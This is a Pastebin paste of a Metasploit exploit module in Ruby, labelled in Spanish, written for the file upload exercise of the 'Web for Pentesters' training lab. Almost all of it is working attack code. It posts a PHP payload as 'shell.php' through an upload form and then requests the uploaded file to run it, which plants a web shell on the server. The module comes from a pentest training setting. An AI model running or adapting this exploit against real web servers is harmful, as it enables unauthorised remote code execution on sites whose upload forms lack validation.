Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- require 'msf/core'
- class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
- include Msf::Exploit::Remote::HttpClient
- def initialize(info={})
- super( update_info( info, {
- 'Name' => 'File Upload en Web for pentesters',
- 'Description' => 'Ejemplo de File Upload',
- 'License' => MSF_LICENSE,
- 'Author' => [ 'nodoraiz', 'Miguel Angel Garcia' ],
- 'Platform' => ['php'],
- 'Arch' => ARCH_PHP,
- 'Targets' => [['Automatic',{}]],
- 'DefaultTarget' => 0
- }))
- register_options([
- OptString.new("path", [ true, "Ruta al formulario de subida", "/upload/example1.php" ]),
- OptString.new("file", [ true, "Nombre del fichero a crear", "shell.php" ]),
- ], self.class)
- end
- def check()
- init = send_request_cgi({
- 'method' => 'GET',
- 'uri' => normalize_uri(target_uri.path, datastore["path"])
- })
- if !init or init.code != 200
- return Exploit::CheckCode::Safe
- else
- return Exploit::CheckCode::Vulnerable
- end
- end
- def upload()
- data = Rex::MIME::Message.new
- data.add_part(payload.encoded, "application/x-php", nil, "form-data; name=\"image\"; filename=\"#{datastore["file"]}\"")
- data.add_part('Send file', nil, nil, 'form-data; name="send"')
- upl = send_request_cgi({
- 'uri' => normalize_uri(target_uri.path , datastore["path"]),
- 'method' => "POST",
- 'ctype' => "multipart/form-data; boundary=#{data.bound}",
- 'data' => data.to_s
- })
- upl
- end
- def exploit()
- upl = upload()
- if !upl or upl.code != 200
- fail_with("Fallo en la subida del fichero")
- else
- send_request_raw({'uri' => "/upload/images/#{datastore["file"]}"})
- end
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
